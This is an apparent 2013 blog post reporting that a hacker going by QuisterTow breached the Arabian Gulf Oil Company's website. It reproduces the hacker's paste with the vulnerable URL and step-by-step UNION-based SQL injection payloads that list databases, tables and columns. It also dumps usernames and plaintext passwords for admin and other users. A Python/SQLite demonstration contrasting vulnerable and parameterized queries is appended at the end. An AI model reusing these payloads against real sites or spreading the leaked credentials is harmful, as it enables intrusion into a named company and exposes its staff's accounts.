http://digital-intifada.blogspot.com/2012/04/digital-intifada-exclusive-interview.html

Wednesday, 6 March 2013

Arabian Gulf Oil Company (Agoco) website hacked by QuisterTow

A hacker using the online handle QuisterTow has claimed to have identified a critical SQL injection vulnerability in the Agoco website (agoco.com.ly). Agoco, the Arabian Gulf Oil Company, is based in Benghazi, Libya, and is engaged in crude oil and natural gas exploration, production and refining.

The hacker exploited this vulnerability and managed to dump the database from the server. He has leaked the login credentials from the database along with the database details.

The leak (pastebin.com/8HLiDqVt) contains the usernames and passwords of the admin and a few users. The admin password is a very weak one and was leaked in plain text.

The hacker also provided the vulnerable link along with a proof of concept for this SQL injection vulnerability that lists the username and password information.

==========
Target : http://www.agoco.com.ly/  [Arabian Gulf Oil Company]
Author : QuisterTow     /     twitter.com/quistertow
Hour   : 17:58
Date   : 6 March 2013
==========
/*!DATABASES*/

information_schema
agococo_agoco  - current database
agococo_agoen

SYNTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name) from information_schema.schemata-- -

/*!end*/

/*!TABLES*/

AIRLINES_SCEDULE
USERS_ACCESS_RIGHT
airlines
artical
category
client_category
clients
economic_services
es_daily_actions
es_items
guest_book
nationalty_cd
occupation
order_category
order_items
oreder_header
page_customization
professional_cd
users
vacancies_need
vote_a
vote_q

SYNTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(/*!table_name*/) from information_schema.tables where table_schema=database()-- -

/*!end*/

/*!USERS COLUMNS */

id
user_nm
user_id
user_password
admin_fg
active_fg
news_fg
tenders_fg
events_fg
env_fg
presentation_fg
project_fg
traning_fg
chairman_fg
super_user
careers_fg
magazine_fg
conference_fg
business_fg
about_fg
libya_fg
link_fg
travel_fg
vacancies_fg
benefits_fg
community_fg
applying_fg
annoucments_fg
exploration_fg

SYNTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(/*!column_name*/) from information_schema.columns where /*!table_name*/=0x7573657273-- -

/*!END*/

/*!DATA -- user and password */
admin:ecs747:
sofian shibani:123456:
intisar:ecs747:
hak:nimb:
agoco admin:ecs747:

SYNTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(user_nm,0x3a,/*!user_password*/,0x3a) from users-- -

/*!end*/


That's all

      QuisterTow
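The bug class behind the dump above, as an added illustration that is not part of the post or of the hacker's paste: a Python/SQLite model of a details.php-style lookup, written once with the request parameters spliced into the query string (the pattern that lets a UNION in `id` pull rows from `users`) and once with type checks and bound parameters. The table and column names are taken from the dump; the rows, passwords and function names are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the site's database: table and column names come from the
# page's dump (artical, users, user_nm, user_password); the rows and passwords are made up.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE artical (id INTEGER, cid INTEGER, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER, user_nm TEXT, user_password TEXT);
        INSERT INTO artical VALUES (1148, 75, 'Refinery news', 'public article text');
        INSERT INTO users VALUES (1, 'admin', 'example-pw-1'), (2, 'guest', 'example-pw-2');
    """)
    return db

def details_vulnerable(db, cid, article_id):
    # The defect behind the leak: request values are concatenated into the SQL text, so a
    # UNION placed in `id` appends rows of the attacker's choosing (here the users table).
    sql = ("SELECT id, title, body FROM artical WHERE cid=" + str(cid)
           + " AND id=" + str(article_id))
    return db.execute(sql).fetchall()

def details_hardened(db, cid, article_id):
    # Fix: enforce the expected integer type, then bind the values as parameters. Bound
    # values travel as data and are never parsed as SQL, so the same input changes nothing.
    try:
        cid, article_id = int(cid), int(article_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT id, title, body FROM artical WHERE cid=? AND id=?"
    return db.execute(sql, (cid, article_id)).fetchall()

# Same shape as the dump's last SYNTAX line, in SQLite dialect (no /*! */ version comments,
# || ':' instead of 0x3a); the column count must match the original SELECT's three columns.
UNION_PAYLOAD = ("-1148 UNION SELECT 1, group_concat(user_nm || ':' || user_password, ','), 3 "
                 "FROM users-- -")

def demo():
    db = build_db()
    return {
        "normal": details_vulnerable(db, 75, 1148),
        "vulnerable_with_payload": details_vulnerable(db, 75, UNION_PAYLOAD),
        "hardened_with_payload": details_hardened(db, 75, UNION_PAYLOAD),
        "hardened_normal": details_hardened(db, 75, 1148),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The string-built version returns the concatenated user_nm:user_password pairs in place of an article; the parameterized version returns the article for a real id and nothing for the injected string.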
